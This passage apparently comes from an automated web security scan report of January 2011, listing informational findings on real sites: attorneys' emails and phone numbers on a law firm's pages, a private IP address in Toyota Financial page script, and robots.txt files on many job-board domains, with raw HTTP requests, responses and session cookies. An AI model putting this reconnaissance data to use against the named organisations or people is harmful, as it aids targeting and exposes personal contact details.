Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&subHeadName=Representative+Experience');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&SubHeadName=Professional Recognition');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&SubHeadName=Publications and Presentations');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=jvris@velaw.com&atty_name=Jane Lee Vris&atty_lname=Vris&atty_fname=Jane&atty_mname=Lee&atty_level=2&atty_phone=+1.212.237.0087&atty_cell=&atty_fax=+1.917.849.5387&atty_phone2=&atty_fax2=&officeid=284&alterofficeid=">
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= jvris@velaw.com&atty_name=Jane Lee Vris')">jvris@velaw.com</a>
...[SNIP]...

17.31. http://www.velaw.com/offices/Dallas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/offices/Dallas.aspx

Issue detail

The following email address was disclosed in the response:

mwortley@velaw.com

Request

GET /offices/Dallas.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script id="EktronJ
...[SNIP]...
<td>mwortley@velaw.com</td>
...[SNIP]...

17.32. http://www.velaw.com/offices/Houston.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/offices/Houston.aspx

Issue detail

The following email address was disclosed in the response:

myeates@velaw.com

Request

GET /offices/Houston.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script id="EktronJ
...[SNIP]...
<td>myeates@velaw.com</td>
...[SNIP]...

18. Private IP addresses disclosed previous next
There are 2 instances of this issue:

http://www.toyotafinancial.com/consumer/tfs.portal
https://www.toyotafinancial.com/consumer/tfs.portal

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

18.1. http://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.60.169.252

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=jc98N5JMXvLLjLZFlFRQcc3KJbJlSv4lvpbgGG4LTpMJ6ZqH1DQL!2083777476!658673615; path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

   <head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
}

//var baseUrl= schemeAjax + '://www.toyotafinancial.com:80/consumer/';
var baseUrl= schemeAjax + '://www.toyotafinancial.com/consumer/';

function callAjax(){
//var url = 'http://10.60.169.252:7090/consumer/jsp/tfs/ofsc/sendMenuResponse.jsp';
var url = baseUrl+'jsp/tfs/ofsc/sendMenuResponse.jsp';
//alert('URL= '+url);

       var myAjax = new Ajax.Request(
       url,
       {
           method: '
...[SNIP]...

18.2. https://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.60.169.252

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:43 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

   <head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
}

//var baseUrl= schemeAjax + '://www.toyotafinancial.com:80/consumer/';
var baseUrl= schemeAjax + '://www.toyotafinancial.com/consumer/';

function callAjax(){
//var url = 'http://10.60.169.252:7090/consumer/jsp/tfs/ofsc/sendMenuResponse.jsp';
var url = baseUrl+'jsp/tfs/ofsc/sendMenuResponse.jsp';
//alert('URL= '+url);

       var myAjax = new Ajax.Request(
       url,
       {
           method: '
...[SNIP]...

19. Robots.txt file previous next
There are 107 instances of this issue:

http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hrcrossing.com/
http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.journalismcrossing.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
http://www.nursingcrossing.com/
http://www.nytimes.com/2011/01/18/books/18book.html
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.retailcrossing.com/
http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

19.1. http://www.bilingualcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bilingualcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:08 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:23:24 GMT
ETag: "22f0ab3-1b0c-4948c34805300"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6924
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.2. http://www.biotechcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biotechcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:46:36 GMT
ETag: "2530328-1b0e-4855eadca9f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6926
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.3. http://www.bluecollarcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluecollarcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:15:18 GMT
ETag: "1b781da-1b0d-4948c17888d80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6925
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.4. http://www.businessanalystcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessanalystcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:46:18 GMT
ETag: "250830c-1a83-483c7506e9e80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.5. http://www.businessdevelopmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessdevelopmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:46:51 GMT
ETag: "2670170-1b0a-4855eaeaf80c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.6. http://www.callcentercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.callcentercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:47:16 GMT
ETag: "24e02d0-1b0a-4855eb02cf900"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.7. http://www.chefcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chefcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:47:25 GMT
ETag: "22f1ff7-1b0a-4855eb0b64d40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.8. http://www.civilengineeringcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.civilengineeringcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:00 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:47:45 GMT
ETag: "22a830a-1a83-483c7559e2240"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.9. http://www.clevelcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clevelcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:11 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:42:31 GMT
ETag: "2320100-1a84-483c742e6dfc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.10. http://www.clinicalresearchcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clinicalresearchcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:19 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:12 GMT
ETag: "1d0029d-1b0a-4855ebaaa8500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.11. http://www.compliancecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.compliancecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:26 GMT
ETag: "1d081bc-1b0a-4855ebb802480"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.12. http://www.computeraideddesigncrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.computeraideddesigncrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:49 GMT
ETag: "1c302c2-1a83-483c76b505540"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.13. http://www.constructioncrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.constructioncrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:34 GMT
ETag: "2281662-1b0a-4855ebbfa3680"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.14. http://www.consultingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consultingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:29:37 GMT
ETag: "24f024d-1bf0-476fa985d5e40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.15. http://www.contractmanagementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contractmanagementcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:34 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:00 GMT
ETag: "221a176-1bf0-476fa99bc5200"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.16. http://www.counselingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.counselingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:47 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:20 GMT
ETag: "1c80182-1bf0-476fa9aed7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.17. http://www.cpluspluscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cpluspluscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:05:21 GMT
ETag: "26b03ff-1bd8-476fb18283640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.18. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=17142
Expires: Sat, 22 Jan 2011 03:10:39 GMT
Date: Fri, 21 Jan 2011 22:24:57 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...

19.19. http://www.customerservicecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

